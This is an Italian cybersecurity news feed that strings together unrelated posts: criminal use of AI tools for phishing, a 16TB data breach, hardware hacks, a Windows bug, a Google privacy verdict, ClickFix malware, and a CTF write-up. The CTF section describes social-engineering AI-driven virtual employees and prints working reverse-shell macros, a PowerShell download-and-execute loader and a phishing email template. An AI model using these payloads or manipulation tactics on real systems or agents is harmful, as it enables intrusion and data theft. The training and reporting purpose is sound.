I ricercatori di Okta hanno notato che aggressori sconosciuti stanno utilizzando lo strumento di intelligenza artificiale generativa v0 di Vercel per creare pagine false che imitano quelle reali. V0 è uno strumento che consente agli utenti di creare landing page di base e app complete utilizzando solo prompt di testo. Ora, i ricercatori hanno scoperto che questa funzionalità viene sfruttata in modo improprio dagli aggressori per creare repliche convincenti delle pagine di accesso di diversi marchi noti (tra cui un cliente Okta di cui non è stato reso noto il nome).

È stato inoltre scoperto che gli aggressori hanno inserito altre risorse sull’infrastruttura di Vercel, inclusi falsi loghi aziendali. Si presume che gli hacker stessero abusando della piattaforma nel tentativo di eludere il rilevamento.

Vercel ha ora bloccato l’accesso alle pagine di phishing rilevate.

Gli esperti sottolineano che, a differenza dei tradizionali kit di phishing (la cui configurazione richiede una certa conoscenza e impegno), v0 e strumenti open source simili, disponibili gratuitamente su GitHub, consentono agli aggressori di creare pagine false semplicemente digitando un messaggio di testo. Questo velocizza il processo e non richiede alcuna programmazione, aiutando anche i truffatori meno esperti a creare rapidamente siti di phishing convincenti.

“L’attività che abbiamo scoperto conferma che i moderni autori di minacce stanno sperimentando attivamente strumenti di intelligenza artificiale generativa, utilizzandoli come armi per ottimizzare e migliorare le proprie capacità di phishing”, hanno scritto i ricercatori. “Sfruttare una piattaforma come v0.dev di Vercel consente agli autori di minacce di creare rapidamente pagine di phishing ingannevoli e di alta qualità, aumentando la velocità e la portata delle loro operazioni”.

Vale la pena notare che la scorsa settimana anche gli esperti di Cisco hanno scritto della popolarità dell’IA tra i criminali . Secondo loro, gli aggressori stanno utilizzando sempre più modelli linguistici di grandi dimensioni (LLM) per le loro attività, creando versioni speciali non censurate a tale scopo.

Uno di questi LLM che ha guadagnato popolarità tra i criminali informatici è WhiteRabbitNeo, pubblicizzato come un “modello di intelligenza artificiale non censurata per i team (Dev)SecOps” e presumibilmente utilizzabile sia nella sicurezza informatica offensiva che difensiva. Cisco sottolinea che questo LLM contribuisce alla creazione di strumenti di hacking offensivi, email di phishing e altro ancora.

Gli hacker hanno anche sviluppato i propri LLM senza restrizioni, che ora vengono venduti ad altri criminali informatici. Tra questi LLM, il rapporto elenca: WormGPT , FraudGPT , GhostGPT, DarkGPT e DarkestGPT.

I creatori di tali modelli pubblicizzano i loro prodotti, promettendo che aiuteranno a scrivere codice dannoso, creare malware “invisibili”, pagine e-mail di phishing, strumenti di hacking, cercare vulnerabilità e fughe di notizie, offuscamento del codice e molto altro.

L'articolo Da AI white ad AI black il passo è breve. Nuovi strumenti per Script Kiddies bussano alle porte proviene da il blog della sicurezza informatica.

Come già anticipato da Red Hot Cyber, un imponente data breach di 16TB di dati ha colpito doValue S.p.A., una delle principali società italiane ed europee specializzate nei servizi di gestione e recupero crediti. In un comunicato ufficiale pubblicato sul proprio sito, l’azienda ha confermato di essere stata vittima di un attacco informatico e ha avviato indagini interne con il supporto delle autorità competenti e di esperti in cybersecurity.

È importante sottolineare che doValue ha risposto in modo etico e trasparente già il 5 maggio scorso, pubblicando un comunicato ufficiale sull’accaduto prima ancora che i dati venissero resi pubblici nei forum underground. Questo tempismo dimostra una volontà chiara di affrontare l’incidente in modo responsabile, informando tempestivamente stakeholder e autorità. La lunga finestra temporale tra l’attacco e la pubblicazione dei dati da parte dei criminali lascia ipotizzare che sia stata tentata un’attività estorsiva nei confronti dell’azienda, che tuttavia non avrebbe ceduto al ricatto, coerentemente con una linea di condotta ferma e conforme ai principi di legalità e integrità.

Nonostante la complessità e la delicatezza dell’attacco, l’azienda ha immediatamente preso posizione pubblicamente, confermando l’accaduto e avviando una comunicazione trasparente con tutti gli stakeholder. Questa prontezza nella risposta, soprattutto a seguito della messa in vendita dei dati da parte dei cyber criminali, dimostra un atteggiamento responsabile e conforme alle best practice di gestione degli incidenti informatici.

“Il 5 maggio 2025, a seguito di approfondite analisi tecniche, è stato accertato che un incidente di sicurezza ha comportato una violazione di dati personali ai sensi del Regolamento (UE) 2016/679. In particolare, nonostante le misure di sicurezza organizzative e tecniche da noi implementate, le evidenze raccolte indicano che soggetti non autorizzati hanno ottenuto un accesso illecito ad alcuni sistemi informatici della nostra organizzazione e hanno esfiltrato dati presenti nei sistemi da noi usati per lo svolgimento delle attività di gestione e recupero crediti e d’informazioni commerciali. Tale accesso, in ogni caso, è a oggi cessato.”

Il leak: oltre 16 TB di dati e directory interne

Nel frattempo, su molti forum del dark web, sono stati pubblicati degli annunci di messa in vendita di oltre 16 terabyte di dati esfiltrati dalla rete di doValue e delle sue controllate, tra cui ItalFondiario, Altamira, doBank, doData, doNext, doValue Greece e doValue Spain.

Nel post vengono condivisi i treeview (ovvero l’alberatura in formato tetuale dei dati esfiltrati) , a conferma che i file proverrebbero da ambienti Active Directory aziendali. Vista la quantità ingente dei dati trafugati, l’attacco rappresenta un colpo pesante per l’intero comparto finanziario e della gestione del credito, evidenziando ancora una volta la vulnerabilità dei grandi ecosistemi IT altamente interconnessi.

L’azienda ha dichiarato di aver notificato il data breach al Garante per la Protezione dei Dati Personali e di essere impegnata a comunicare eventuali impatti diretti alle persone coinvolte, come previsto dalla normativa GDPR.

Dall’evento di cui sopra, come anticipato, è derivata una perdita di confidenzialità dei dati esfiltrati, che potrebbero essere usati da soggetti non autorizzati per finalità difformi da quelle per cui tali dati sono stati originariamente raccolti. In particolare, è possibile che terzi non autorizzati tentino di adoperare tali dati per compiere azioni di c.d. ‘ingegneria sociale’ e realizzare frodi. In ogni caso, a oggi non abbiamo evidenza di fenomeni di diffusione e/o pubblicazione dei dati esfiltrati. In questa sede, pertanto, richiamiamo la Sua attenzione sulla necessità di prestare la massima cautela con riguardo a eventuali comunicazioni che dovesse ricevere e con le quali Le dovesse venire richiesto di effettuare transazioni finanziarie e/o fornire informazioni personali, in quanto potrebbero derivare da un tentativo di frode. Pertanto, in caso di ricezione di tale tipo di comunicazioni e qualora l’interlocutore faccia riferimento a pratiche di gestione del credito gestite da doValue, Le raccomandiamo di accertare sempre l’effettiva autenticità e la provenienza delle stesse e la coerenza degli estremi di pagamento forniti (per esempio verificando l’attendibilità del mittente e contattando gli uffici di doValue ai recapiti ufficiali presenti nel nostro sito Internet e/o nelle comunicazioni scritte da noi ricevute nel contesto delle attività di recupero crediti, nonché, in caso di procedure giudiziali, anche prendendo contatti con il legale incaricato).

Conclusione

Il caso doValue si inserisce in una crescente ondata di attacchi mirati al settore finanziario europeo, e conferma l’evoluzione aggressiva delle tattiche impiegate dai cyber criminali. Red Hot Cyber continuerà a monitorare la situazione per fornire aggiornamenti in tempo reale e approfondimenti esclusivi.

L'articolo DoValue conferma la violazione con un comunicato stampa proviene da il blog della sicurezza informatica.

Some time last year, a weird thing happened in the hackerspace where this is being written. The Internet was up, and was blisteringly fast as always, but only a few websites worked. What was up? Fortunately with more than one high-end networking specialist on hand it was quickly established that we had a problem with our gateway’s handling of IPv4 addresses, and normal service was restored. But what happens if you’re not a hackerspace with access to the dodgy piece of infrastructure and you’re left with only IPv6? [James McMurray] had this happen, and has written up how he fixed it.

His answer came in using a Wireguard tunnel to his VPS, and NAT mapping the IPv4 space into a section of IPv6 space. The write-up goes into extensive detail on the process should you need to follow his example, but for us there’s perhaps more interest in why here in 2025, the loss of IPv4 is still something that comes with the loss of half the Internet. As of this writing, that even includes Hackaday itself. If we had the magic means to talk to ourselves from a couple of decades ago our younger selves would probably be shocked by this.

Perhaps the answer lies in the inescapable conclusion that IPv6 answers an address space problem of concern to many in technical spaces, it neither solves anything of concern to most internet users, nor is worth the switch for so much infrastructure when mitigations such as NAT make the IPv4 address space problem less of a problem. Will we ever entirely lose IP4? We’d appreciate your views in the comments. For readers anxious for more it’s something we looked at last year.

hackaday.com/2025/07/03/its-20…

Prove di intrusioni mafiche dell'Adeano nella cintura di rocce verdi di Nuvvuagittuq, Canada

La Terra ha l'abitudine di rinnovare la sua crosta attraverso la fusione e la ricristallizzazione, cancellando così gran parte della sua storia primordiale. Esistono frammenti minerali risalenti all'eone più antico, l'Adeano, ma c'è scarso consenso sull'esistenza di una crosta primordiale intatta. Sole et al . hanno riesaminato le rocce oceaniche della Cintura di rocce verdi di Nuvvuagittuq, nel Canada nord-orientale, confrontando sistemi isotopici di samario-neodimio a vita lunga e breve per determinare quando le rocce si cristallizzarono per la prima volta. I loro nuovi test indicano un'età di circa 4,2 miliardi di anni, un'ulteriore prova che potrebbe essere rimasta una porzione della crosta dell'Adeano.

science.org/doi/10.1126/scienc…

@Scienza e tecnologia

Un’importante realtà operante nel settore della gestione e recupero crediti a livello europeo potrebbe essere finita nel mirino dei cybercriminali. Secondo quanto emerso da un annuncio comparso su un noto forum del dark web, un attore malevolo ha messo in vendita oltre 16 terabyte di dati esfiltrati dai server aziendali e da numerose controllate, dislocate in diversi Paesi, tra cui Grecia, Spagna e Italia.

L’azienda colpita gestisce asset finanziari per conto di banche e istituzioni, e si occupa di gestione di portafogli di crediti deteriorati (NPL), oltre a fornire servizi di due diligence, gestione documentale e supporto amministrativo. I dati compromessi includerebbero interi file system provenienti da server di database e Active Directory, contenenti probabilmente informazioni su clienti, documentazione interna, report finanziari, contratti e corrispondenze sensibili.

Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.

Nel messaggio pubblicato dai cybercriminali, gli autori spiegano che i dati sono troppo voluminosi per essere condivisi come prova diretta, ma hanno pubblicato alberi delle directory per dimostrare l’entità dell’infiltrazione. I dati sembrano provenire da più domini Active Directory collegati alle sedi e sussidiarie europee del gruppo.

I dettagli del presunto attacco informatico

L’accesso ai dati viene offerto in vendita con prezzo negoziabile, e l’autore fornisce anche dei token di sessione per comunicazioni riservate con potenziali acquirenti. Una violazione di questa portata qualora confermata, rappresenta una minaccia concreta per migliaia di individui e istituzioni. Se confermati, i dati potrebbero contenere:

• Informazioni personali e bancarie di debitori
• Dati su portafogli finanziari e investimenti
• Documentazione legale riservata
• Strutture di gestione interna e credenziali di accesso

Inoltre, l’esposizione di infrastrutture Active Directory può facilitare nuove azioni offensive, come movimenti laterali all’interno delle reti, attacchi ransomware o compromissione di ambienti cloud integrati.

Conclusione

L’incidente evidenzia, ancora una volta, quanto siano vulnerabili anche le infrastrutture critiche delle aziende che gestiscono ingenti volumi di dati finanziari. È essenziale che tali enti adottino misure di cybersecurity avanzate, tra cui segmentazione delle reti, monitoraggio attivo, audit di sicurezza e piani di risposta agli incidenti.

Il settore del recupero crediti e della gestione patrimoniale, per la natura altamente sensibile dei dati trattati, rimane una delle aree più a rischio nel panorama delle minacce informatiche globali.

L'articolo 16TB di un’azienda italiana di Financial Service, in vendita nelle underground proviene da il blog della sicurezza informatica.

Questa cosa è la bomba atomica nello stagno 😀

Poi lamentiamoci dell'Europa...

Nel 2026 entra in vigore la direttiva europea: si potranno conoscere le buste paga dei colleghi che svolgono lo stesso lavoro, discriminare sarà più difficile

Nello specifico, il testo stabilisce che le lavoratrici e i lavoratori e i loro rappresentanti abbiano il diritto di ricevere informazioni esaurienti e chiare sui livelli retributivi medi, suddivisi anche per genere, inerenti alle categorie di lavoratori che svolgono lo stesso lavoro o un lavoro di pari valore.

Non verranno più ammesse clausole nei contratti che vietano di parlare di stipendi. E come detto, c’è la data: le aziende dovranno adeguarsi entro il 7/06/2026, in caso contrario rischiano multe, sanzioni e verranno chiamate a dimostrare di non avere effettuato discriminazioni nei luoghi di lavoro.

#lavoro #genderpaygap #discriminazionedigenere

collettiva.it/copertine/intern…

Like many of us of a certain vintage, [Dillan Stock] at The Stock Pot is nostalgic for VHS tapes. It’s not so much the fuzzy picture or the tracking issues we miss, but the physical experience the physical medium brought to movie night. To recreate that magic, [Dillan] made a Modern VHS with NFC and ESPHome.

NFC tags are contained in handsomely designed 3D printed cartridges. You can tell [Dillan] put quite a bit of thought into the industrial design of these: there’s something delightfully Atari-like about them, but they have the correct aspect ratio to hold a miniaturized movie poster as a label. They’re designed to print in two pieces (no plastic wasted on supports) and snap together without glue. The printed reader is equally well thought out, with print-in-place springs for that all important analog clunk.

Electronically, the reader is almost as simple as the cartridge: it holds the NFC reader board and an ESP32. This is very similar to NFC-based audio players we’ve featured before, but it differs in the programming. Here, the ESP32 does nothing related directly to playing media: it is simply programmed to forward the NFC tag id to ESPHome. Based on that tag ID, ESPHome can turn on the TV, cue the appropriate media from a Plex server (or elsewhere), or do… well, literally anything. It’s ESPHome; if you wanted to make this and have a cartridge to start your coffee maker, you could.

If this tickles your nostalgia bone, [Dillan] has links to all the code, 3D files and even the label templates on his site. If you’re not sold yet, check out the video below and you might just change your mind. We’ve seen hacks from The Stock Pot before, everything from a rebuilt lamp to an elegant downspout and a universal remote.

youtube.com/embed/Jhhwn7OA_xY?…

hackaday.com/2025/07/03/relivi…

Ebbene sì, ancora una volta un aggiornamento di Windows ha scatenato l’inferno. L’innocua funzione “Microsoft Print to PDF”, da anni alleata silenziosa di utenti e amministratori IT, è finita KO dopo l’aggiornamento preview di aprile 2025 su sistemi Windows 11 24H2.

Una funzionalità data per scontata, quella della stampa PDF, che improvvisamente… scompare nel nulla. Niente più stampante PDF sotto Impostazioni > Dispositivi Bluetooth e stampanti. E per chi prova a riattivarla tramite funzionalità opzionali o PowerShell? Una bella schermata con l’errore 0x800f0922. La stampante non si reinstalla e il driver non si trova.

Il fix? Solo per chi osa le patch opzionali

Microsoft ha finalmente messo una pezza al disastro con l’aggiornamento cumulativo KB5060829, rilasciato in anteprima lo scorso venerdì.
Ma attenzione: il fix è solo per i coraggiosi che installano gli update opzionali di giugno.
Per tutti gli altri, l’attesa durerà fino al Patch Tuesday di luglio.

Nel frattempo, chi non vuole aspettare dovrà tentare la riabilitazione manuale:

• Aprire la finestra “Funzionalità facoltative” con Win + R, digitare optionalfeatures e cercare Microsoft Print to PDF.

• Oppure usare PowerShell (con privilegi amministrativi), eseguendo:

Disable-WindowsOptionalFeature -Online -FeatureName Printing-PrintToPDFServices-FeaturesEnable-WindowsOptionalFeature -Online -FeatureName Printing-PrintToPDFServices-Features
Anche in questo caso, però, l’errore 0x800f0922 potrebbe ripresentarsi.

Non è la prima volta: quando aggiornare diventa un rischio

Questa non è che l’ennesima puntata di una lunga serie.
A marzo, altri aggiornamenti mandavano in crisi le stampanti USB, facendole sputare caratteri casuali come se fossero impazzite.
A giugno, Microsoft ha addirittura avvisato di possibili ritardi nelle patch di sicurezza a causa di metadati errati e problemi critici con Windows Update.

L’IT tra aggiornamenti e imprevisti

In un contesto in cui anche un semplice aggiornamento può nascondere qualche imprevisto, i team IT si trovano spesso a dover pianificare con attenzione ogni installazione, testando le patch prima del rilascio definitivo e monitorando eventuali anomalie.

Questa volta è toccato alla stampa PDF. La prossima? Magari un driver Bluetooth, magari nulla.
Quel che è certo è che ogni Patch Tuesday porta con sé qualche sorpresa… e un pizzico di sana prudenza non guasta mai.

L'articolo Caos da Patch: un aggiornamento di Windows 11 manda in tilt la stampa PDF proviene da il blog della sicurezza informatica.

[juskim] wanted to build a tiny mouse, but it couldn’t just be any mouse. It had to be a high-tech gaming mouse that could compete with the best on raw performance. The results are impressive, even if the final build is perhaps less than ideal for pro-level gameplay.

The build riffs on an earlier build from [juskim] that used little more than a PCB and a 3D-printed housing to make a barebones skeleton mouse. However, this one ups the sophistication level. At the heart of the build is the nRF54L15 microcontroller, which is paired with a PAW3395 mouse sensor which is commonly used in high-end gaming mice. It offers resolution up to 26K DPI for accurate tracking, speeds up to 650 ips, and 8 kHz sampling rates. Long story short, if you want fine twitch control, this is the sensor you’re looking for. The sensor and microcontroller are laced together on a custom PCB with a couple of buttons, a battery, and a charging circuit, and installed in a barebones 3D-printed housing to make the final build as small as possible.

The only real thing letting the design down is the mouse’s key feature—the size. There’s very little body to grab on to and it’s hard to imagine being able to play most fast-paced games at a high level with such a tiny device. Nevertheless, the specs are hardcore and capable, even if the enclosure isn’t.

[juskim] loves building tiny peripherals; we’ve featured his fine work before, too. Video after the break.

youtube.com/embed/XgV3BgWfUFY?…

hackaday.com/2025/07/02/smalle…

Google è al centro di un’imponente causa in California che si è conclusa con la decisione di pagare oltre 314 milioni di dollari agli utenti di smartphone Android nello stato. Una giuria di San Jose ha stabilito che l’azienda ha violato i diritti dei proprietari di dispositivi mobili raccogliendo dati dai loro telefoni senza autorizzazione, anche quando i dispositivi erano in modalità standby.

Come ha spiegato l’avvocato dei querelanti, Glen Summers, la decisione del tribunale conferma la gravità delle violazioni commesse da Google e l’equità delle accuse mosse nei suoi confronti. Secondo lui, le azioni dell’azienda hanno costretto milioni di utenti in California a consumare i propri dati mobili, mentre le informazioni raccolte venivano utilizzate a vantaggio dell’azienda stessa, per scopi pubblicitari e altri scopi commerciali.

La class action è stata intentata nel 2019 e sosteneva che Google continuasse a inviare e ricevere dati dai dispositivi Android tramite i suoi servizi anche quando gli utenti non interagivano con i telefoni. Secondo l’accusa, ciò avrebbe interessato circa 14 milioni di californiani.

Gli avvocati di Google hanno insistito sul fatto che non era stato arrecato alcun danno agli utenti. La principale argomentazione dell’azienda era che tutti questi processi erano descritti in anticipo nei termini di utilizzo e nell’informativa sulla privacy che ciascun utente accetta al momento dell’attivazione del dispositivo. Tuttavia, la giuria ha deciso diversamente, a sostegno della posizione dei ricorrenti.

Il portavoce di Google, José Castaneda, ha dichiarato che l’azienda non è d’accordo con la decisione del tribunale e intende presentare ricorso. Ha inoltre osservato che questi processi di raccolta dati sono parte integrante della garanzia della sicurezza, della stabilità e dell’affidabilità dei dispositivi Android.

Una causa simile che coinvolge utenti Android in altri 49 stati degli Stati Uniti è pendente presso il tribunale federale di San Jose. Il processo dovrebbe iniziare nell’aprile 2026. Questa situazione sta diventando l’ultimo episodio di una serie di azioni legali contro le più grandi aziende IT, sempre più accusate di gestione non etica dei dati personali.

Nel caso di Google, non si tratta solo di una questione di privacy, ma anche del fatto che le informazioni siano state raccolte a spese delle risorse degli utenti, il che ha causato ulteriore indignazione.

L'articolo Se è gratuito, il prodotto sei tu. Google paga 314 milioni di dollari per violazione dei dati agli utenti Android proviene da il blog della sicurezza informatica.

La RHC Conference 2025, organizzata da Red Hot Cyber, ha rappresentato un punto di riferimento per la comunità italiana della cybersecurity, offrendo un ricco programma di talk, workshop e competizioni. Tra gli eventi più attesi, spiccano le Capture The Flag (CTF), che hanno coinvolto i partecipanti in sfide avvincenti e realistiche.

Queste CTF hanno portato i partecipanti nel cuore di una crisi geopolitica simulata: una Cyber Warfare Ibrida contro la nazione fittizia di Minzhong, in cui attori malevoli puntavano a sabotare la supply chain e le reti 4G locali. Questa simulazione, realizzata con il contributo di CyberSecurityUP, Hackmageddon e Fondazione Bruno Kessler (FBK), ha spinto i concorrenti a confrontarsi con tematiche moderne come AI, minacce ibride, disinformazione e infrastrutture critiche, alzando l’asticella del realismo tecnico e narrativo.

Una delle CTF più innovative è stata quella dedicata al Social Engineering, organizzata dalla FBK e dall’Università di Trento in collaborazione con il collettivo HackerHood, che ha offerto ai partecipanti un’esperienza immersiva e un approccio rivoluzionario per le sfide CTF, simulando un ambiente realistico gestito dall’intelligenza artificiale, che gli attaccanti potevano compromettere combinando tecniche di manipolazione psicologica con exploit tecnologici.

Una piattaforma di social engineering per una CTF realistica

La CTF sul Social Engineering si è distinta per l’uso innovativo di una piattaforma sperimentale sviluppata in ambito di ricerca. Questa piattaforma, creata da FBK e dall’Università di Trento, ha generato dinamicamente una finta infrastruttura ICT: indirizzi email, utenti fittizi, un servizio di storage cloud e identità virtuali dotate di personalità credibili, in grado di interagire in linguaggio naturale con i partecipanti.

Il cuore della competizione non era l’exploitation tecnica, ma l’inganno: convincere questi “personaggi virtuali” a rivelare informazioni sensibili, cliccare su link o scaricare allegati. Tutto questo grazie all’uso sapiente dell’ingegneria sociale, combinata con l’analisi dei dettagli dell’ambiente simulato.

Il contributo di HackerHood: test e adattamento

Il collettivo HackerHood ha avuto un ruolo essenziale nella riuscita della competizione, contribuendo non solo ad una validazione iniziale di tale piattaforma ma anche all’adattamento della stessa al contesto CTF. Dopo numerose sessioni di test, sono stati migliorati stabilità, scalabilità e credibilità dell’infrastruttura.

I partecipanti si sono trovati davanti a un ecosistema realistico e immersivo, in cui ogni azione produceva reazioni coerenti da parte degli utenti simulati, grazie a un motore di intelligenza artificiale generativa. Questo ha elevato notevolmente il livello di sfida, rendendo ogni interazione una prova di astuzia e precisione linguistica.

Le Flag della CTF: Social Engineering in azione

La CTF si è articolata in una serie di flag a difficoltà crescente, tutte basate sull’ingegneria sociale e sull’interazione con l’ambiente simulato. Ogni flag rappresentava una tappa nel percorso di compromissione dell’infrastruttura aziendale fittizia.

Panoramica delle principali flag

• Scopri la password di un dipendente
  Obiettivo: convincere un dipendente a rivelare o lasciar trapelare la propria password.
• Viola il ticket system aziendale
  Obiettivo: scoprire l’indirizzo email nascosto del supporto IT e sfruttarlo per un attacco.
• Recupera il file “lista-esuberi”
  Obiettivo: ottenere un file riservato presente solo nel sistema di online file sharing.
• Recupera una password condivisa
  Obiettivo: identificare una mail interna in cui veniva condivisa una password aziendale.
• Scopri la chiave privata del CEO
  Obiettivo: recuperare una chiave SSH inviata via email, sfruttando altre compromissioni precedenti.

L’ultima sfida irrisolta “Leggi il contenuto del budget aziendale”

Questa flag rappresentava il punto avanzato dell’intera CTF: per ottenerla, i partecipanti dovevano recuperare e leggere un file PDF riservato chiamato budget-aziendale.pdf, presente solo sul laptop Windows del CEO. Il file era protetto da una password nota soltanto a chi avesse risolto la flag “Recupera una password condivisa” nascosta fra le conversazioni di due dipendenti.

L’obiettivo poteva essere raggiunto seguendo due percorsi alternativi, entrambi validi ma di difficoltà diversa:

1. Accesso tramite SSH:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre uno qualunque dei “personaggi virtuali” ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema Linux. Era quindi possibile utilizzare la chiave SSH ottenuta dal completamento della flag “Scopri la chiave privata del CEO” per accedere interattivamente e tramite movimento laterale al laptop del CEO e leggere il file localmente.

Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

• Recupero della chiave privata del CEO: accedere alla casella mail del CEO e recuperare la sua chiave privata inviata tramite mail. La chiave era gia’ in possesso se la flag “Scopri la chiave privata del CEO” era gia’ stata completata.
• Estrazione della chiave privata del CEO: convincere il CEO a fornire il proprio ID, in modo da poter estrarre la chiave privata.
• Creazione del documento malevolo: creare un documento LibreOffice contenente una macro capace di aprire una reverse shell. Un esempio di macro e’ riportato di seguito.

Function Main
shell("bash -c 'bash -i &> /dev/tcp// 0>&1'")
End Function

• Invio del payload: inviare una mail ad uno dei dipendenti utilizzanti Linux allegando il file malevolo. Un testo di esempio di tale mail e’ riportato di seguito.

Gentile Utente,in allegato le nuove policy di sicurezza appena approvate. La invitiamo cortesemente a prenderne visione e a procedere alla loro attuazione al fine di migliorare la security posture dell'aziendaRestiamo a disposizione per ogni dubbio e chiarimento.Cordialmente,Il dipartimento IT.

• Upload della chiave privata del CEO: caricare sul laptop del dipendente la chiave privata del CEO ottenuta in precedenza.
• Movimento laterale: Utilizzare la shell acquisita sul laptop del dipendente per effettuare un movimento laterale, collegandosi tramite SSH al laptop del CEO mediante l’uso della chiave SSH.
• Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
• Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
• Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.

2. Violazione diretta del laptop del CEO:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre il CEO ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema. Questa strategia era più complicata dal momento che sul portatile Windows era presente un antivirus.Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

• Creazione del documento malevolo: creare un documento Microsoft Office contenente una macro capace di aprire una reverse shell. In questo caso era necessario operare delle operazioni di offuscamento sulla macro, poiché il laptop del CEO era protetto da un antivirus capace di bloccare le macro malevole in chiaro. Un esempio di macro in chiaro e’ riportato di seguito.

Sub Auto_Open()
Last = "powershell -exec bypass IEX ((new-object
net.webclient).downloadstring('http:///poc.txt')) -WindowStyle Minimized"
CreateObject("Wscript.Shell").Run Last
End Sub
Il contenuto del file poc.txt per questa macro e’ riportato di seguito.

$client = New-Object System.Net.Sockets.TCPClient("",);$stream=$client.GetStrean();[byte[]]$bytes = 0..655351|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCITEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

• Invio del payload: inviare una mail al CEO allegando il file malevolo. Un testo di esempio di tale mail e’ riportato al punto d del metodo procedente.
• Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
• Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
• Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.
  

Entrambe le strategie richiedevano competenze trasversali, tempismo e il corretto uso delle flag ottenute in precedenza: la password del file veniva acquisita solo tramite la flag “Recupera una password condivisa”, e l’accesso al sistema era subordinato a compromissioni precedenti “Scopri la chiave privata del CEO” o “Scopri la password di un dipendente”.

Criticità e caratteristiche

• Il file non era accessibile tramite il sistema di file sharing in cloud.
• Era necessario ricostruire correttamente la topologia aziendale per pianificare l’accesso al dispositivo del CEO.
• Il file conteneva la flag finale, una frase ironica che rifletteva il tema aziendale fittizio della simulazione:
  CTFRHC{{W3_H4V3_NO_M0R3_MON3Y}}
  

Completamento e Motivi del fallimento

Nonostante il 95% del percorso fosse stato risolto, nessun team è riuscito a ottenere questa flag e secondo una preliminare valutazione i principali motivi sono i seguenti:

• Gestione del tempo: i partecipanti sono arrivati molto vicini alla soluzione, ma non hanno avuto il tempo sufficiente per completare la catena finale di compromissioni e accessi necessari.
• Approccio tecnico predominante: molti team hanno preferito concentrarsi sull’identificazione e lo sfruttamento di possibili vulnerabilità tecniche dell’infrastruttura, sottovalutando la componente di social engineering, che in questo scenario era in realtà la chiave per aggirare i controlli e convincere i personaggi virtuali ad agire.
• Complessità dell’ambiente IA: il comportamento del CEO era gestito da un’IA configurata per ignorare email da contatti esterni, rendendo inefficaci approcci diretti e costringendo i team a cercare vie interne più complesse.

Conclusioni

I commenti raccolti al termine della competizione parlano chiaro: la combinazione di una piattaforma di social engineering realistica ed interazioni dinamiche guidate da intelligenza artificiale ha offerto ai partecipanti un’esperienza nuova e fresca rispetto alle altre sfide disponibili. Tutti i partecipanti erano concordi sul fatto che questo tipo di approccio fosse una ventata d’aria fresca rispetto alle classiche sfide, costringendoli anche a cambiare mentalità e prospettiva per poterla portare a termine.

La sfida ha alzato significativamente l’asticella, non solo in termini tecnici, ma soprattutto per la capacità di simulare scenari credibili, in cui il fattore umano è al centro del gioco. In un’epoca in cui la manipolazione dell’informazione e l’ingegneria sociale sono armi reali, esperienze come questa rappresentano un passo importante verso una formazione più completa, moderna e aderente alla realtà delle minacce informatiche. La sperimentazione ha dimostrato che è possibile fare didattica e ricerca in modo innovativo, coinvolgente e ad alto impatto.

Il presente articolo e le attività descritte sono frutto di una collaborazione tra FBK, Università di Trento ed Hackerhood. Si ringraziano Manuel Roccon, Matteo Bridi, Alessandro Molinari, Domenico Siracusa, Claudio Facchinetti e Daniele Santoro.

L'articolo CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta proviene da il blog della sicurezza informatica.

Un nuovo malware chiamato LightPerlGirl ha attirato l’attenzione degli esperti di sicurezza informatica per il suo insolito e pericoloso schema di penetrazione dei dispositivi. L’attacco si basa sulla tecnica ClickFix : una finta finestra pop-up CAPTCHA che avvia una complessa sequenza di azioni utilizzando PowerShell e metodi che consentono al codice dannoso di nascondersi completamente dalle soluzioni di sicurezza.

Il nome del malware trae ispirazione dalla riga interna del copyright: “Copyright (c) LightPerlGirl 2025“. La campagna di distribuzione del malware è stata notata per la prima volta dai ricercatori di Todyl dopo aver rilevato script PowerShell anomali su un dispositivo client. Questo è diventato il punto di partenza per indagare su un complesso schema di infezione a più fasi in grado di bypassare i meccanismi di difesa tradizionali.

L’infezione inizia visitando un sito compromesso, il più delle volte sulla piattaforma WordPress, come una risorsa di viaggio. Le pagine ospitano codice JavaScript dannoso, mascherato da controllo di sicurezza di provider noti come Cloudflare. Lo script richiama una finestra con un CAPTCHA falso che, interagendo con esso, richiede all’utente di avviarlo tramite la funzione Esegui di Windows, essenzialmente la prima fase dell’attacco.

Questo comando contatta il server C&C all’indirizzo “cmbkz8kz1000108k2carjewzf[.]info”, da cui viene scaricato il seguente script di PowerShell. Viene eseguito interamente in memoria e include tre moduli: HelpIO, Urex ed ExWpL. Ognuno di essi esegue attività specifiche volte a proteggere il malware nel sistema e a renderlo invisibile.

